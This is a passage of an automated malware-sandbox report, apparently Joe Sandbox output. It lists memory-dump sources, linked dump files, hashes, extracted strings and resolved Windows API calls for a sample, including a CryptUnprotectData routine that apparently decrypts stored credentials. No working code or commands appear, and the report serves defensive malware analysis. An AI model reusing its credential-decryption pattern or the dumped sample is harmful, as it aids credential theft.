                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 9\W~$svZ$3r}
                                • API String ID: 0-4160629106
                                • Opcode ID: d4b75b1c6dff6e9d6bf88f9ead2d367b695aa074b44fbf5b410fe65bf4bbb13e
                                • Instruction ID: 660d8983ee3ecaa477244a6af5fc719f34f26ab319d3719cb0fbf463922ded53
                                • Opcode Fuzzy Hash: d4b75b1c6dff6e9d6bf88f9ead2d367b695aa074b44fbf5b410fe65bf4bbb13e
                                • Instruction Fuzzy Hash: 31B2F8F3A0C2049FE304AE2DEC8566ABBE5EF94720F168A3DEAC4C7744E53558058797
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: @`ey$\ji$G<y
                                • API String ID: 0-737609126
                                • Opcode ID: 04c84a375f2de46cca5bb84111e24cac4710ae89ad05322f7b1125b77cfe9000
                                • Instruction ID: 568a4f1d2f78ed0776055794213ffb668c378dc44bffbbf45ac55ff0d70911a8
                                • Opcode Fuzzy Hash: 04c84a375f2de46cca5bb84111e24cac4710ae89ad05322f7b1125b77cfe9000
                                • Instruction Fuzzy Hash: F7B22BF36082049FE704AE2DEC8567AFBEAEFD4720F16863DE6C4C7744E53598058692
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: `Rz>$kUoh$pp_y
                                • API String ID: 0-2210087962
                                • Opcode ID: 47679efe64abce4f451a6485401dfc6ca86a524961d7a3b158ea4eb21af1cfff
                                • Instruction ID: 58b74c15aadc2b96a2356818baa9e33c415e470d8ce70dd7adeb9edfab6f03fe
                                • Opcode Fuzzy Hash: 47679efe64abce4f451a6485401dfc6ca86a524961d7a3b158ea4eb21af1cfff
                                • Instruction Fuzzy Hash: 12A206F3A082149FE3046E2DEC9567ABBE9EF94720F1A493DEAC4C7344E63558058693
                                APIs
                                • CoCreateInstance.COMBASE(009DB110,00000000,00000001,009DB100,?), ref: 009CCB06
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 009CCB46
                                • lstrcpyn.KERNEL32(?,?,00000104), ref: 009CCBC9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 1940255200-0
                                • Opcode ID: e89acc9d286b0abdddbf81055ad9d7194d2ef52cc4d71027bf6bdc08e71a9aa9
                                • Instruction ID: dcc1ae75b50e756fe502eca4fbb46a5e745cf81392a252bf48efa6d8bd3fbc4c
                                • Opcode Fuzzy Hash: e89acc9d286b0abdddbf81055ad9d7194d2ef52cc4d71027bf6bdc08e71a9aa9
                                • Instruction Fuzzy Hash: 39317871A40619BFD710DB94CC82FA977B9DB88B11F104188FA08EB2D0D7B0AD44CB91
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 009B9B9F
                                • LocalAlloc.KERNEL32(00000040,?), ref: 009B9BB3
                                • LocalFree.KERNEL32(?), ref: 009B9BD7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 20eb96efff1657a0feab34464eb52b9f923785938dd9b3122e6d367b6eeb968e
                                • Instruction ID: 08dcd0bf501c9535f6114fbf84efd492f315a87521a95eb89e293a1b9d299fb2
                                • Opcode Fuzzy Hash: 20eb96efff1657a0feab34464eb52b9f923785938dd9b3122e6d367b6eeb968e
                                • Instruction Fuzzy Hash: CA011DB5A4121AAFE710DBA4DC55FABB77CEB44B00F104554EA04AB281DBB09E00CBE1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: BMU$roZ$voZ
                                • API String ID: 0-2172260609
                                • Opcode ID: 1b4fbeaac32e97fa1cecb77ce68721dee955fb8bcf1a4b38ac72407ab4f6bac2
                                • Instruction ID: 6509ec1c707184c2611a53334382eb02b633fe6205ffeaf6056440f6fdcdf85a
                                • Opcode Fuzzy Hash: 1b4fbeaac32e97fa1cecb77ce68721dee955fb8bcf1a4b38ac72407ab4f6bac2
                                • Instruction Fuzzy Hash: 9151BFB2A0C6189FE3157A18DC517BAF7E8EB45310F16892DEBC287300E632981497E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: (+JM
                                • API String ID: 0-1914792814
                                • Opcode ID: dae2190c3786a5afb5839b95c8c57fdd7caf61b620c63b7268d53e33ee422454
                                • Instruction ID: 0b9305ea5e43afe4d56789c82e68fec2f735cafd3158c3c71bcac04b6ce07e10
                                • Opcode Fuzzy Hash: dae2190c3786a5afb5839b95c8c57fdd7caf61b620c63b7268d53e33ee422454
                                • Instruction Fuzzy Hash: 27514CF3A083005FE304AE2DECC576AB7D6EBD4320F1B463EEA8587784E97558058796
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: >%>
                                • API String ID: 0-1451704855
                                • Opcode ID: 970e64d356b2d3c8b186ed4072e0291f71a8fc79134b5122e2af04fdece36e2d
                                • Instruction ID: a48e3f8752f72b9b34dfe6194542679b5f1b9f5758b1f082d98a5b3158ccf9c9
                                • Opcode Fuzzy Hash: 970e64d356b2d3c8b186ed4072e0291f71a8fc79134b5122e2af04fdece36e2d
                                • Instruction Fuzzy Hash: BE518BF3F187145BE3049A6ADC847A7B6CBDBD4720F1A813DDA88C7748E9795C0542C2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !P^
                                • API String ID: 0-3632790718
                                • Opcode ID: a51ab82dee14197c59218fdaa54465ceb898348f15212c2562d7c08a81082082
                                • Instruction ID: 77f403ad7b3a12be194474b2f77fc39bfb2afed44758d45cf2d4bf06463a9c5a
                                • Opcode Fuzzy Hash: a51ab82dee14197c59218fdaa54465ceb898348f15212c2562d7c08a81082082
                                • Instruction Fuzzy Hash: 675158F7F041105BF304592ADC89766B69BDBE4320F3B863DEE8897788D9794C064291
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: tG'~
                                • API String ID: 0-3719601612
                                • Opcode ID: 20fb095b5f0eac7d3d0bda6bb5adff7dc17a051ceb6c5f2d2936f2fc0fae20ff
                                • Instruction ID: 5fcf83bab7e2d39a85dc3e8a82864f566bf0d4404731b6a01cf0abe15ce0ce9a
                                • Opcode Fuzzy Hash: 20fb095b5f0eac7d3d0bda6bb5adff7dc17a051ceb6c5f2d2936f2fc0fae20ff
                                • Instruction Fuzzy Hash: 0251D7F360C6049FE708BE29EC8973ABBD6EBD4320F26863DD6C547784ED3558458286
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cf8b78b1b1274bf442f39f0e7c10e7d8b433cef0944406edb67d5d6eee4a53b8
                                • Instruction ID: f9033337d742c75a97837135d4ef7526d3a5dc45e370ff5fcdc51d0e0d98a4e2
                                • Opcode Fuzzy Hash: cf8b78b1b1274bf442f39f0e7c10e7d8b433cef0944406edb67d5d6eee4a53b8
                                • Instruction Fuzzy Hash: 328138B391D6145FE304AE3CDC85376BBD5EB94324F2A863DEAC4D7384E979980082C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a407ebe5480351b6b35f47e05e00de2b32386513562a7c41967a9f67768bcb49
                                • Instruction ID: b0b5b0def7ee0f84861ee57081d5a1f093e91bbc0f59ed13f5fd7933aef0e3d9
                                • Opcode Fuzzy Hash: a407ebe5480351b6b35f47e05e00de2b32386513562a7c41967a9f67768bcb49
                                • Instruction Fuzzy Hash: 5D519FF290C6049FE715AE29EC8577AF7E5EF98320F16893DD7C483744EA3558048A87
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
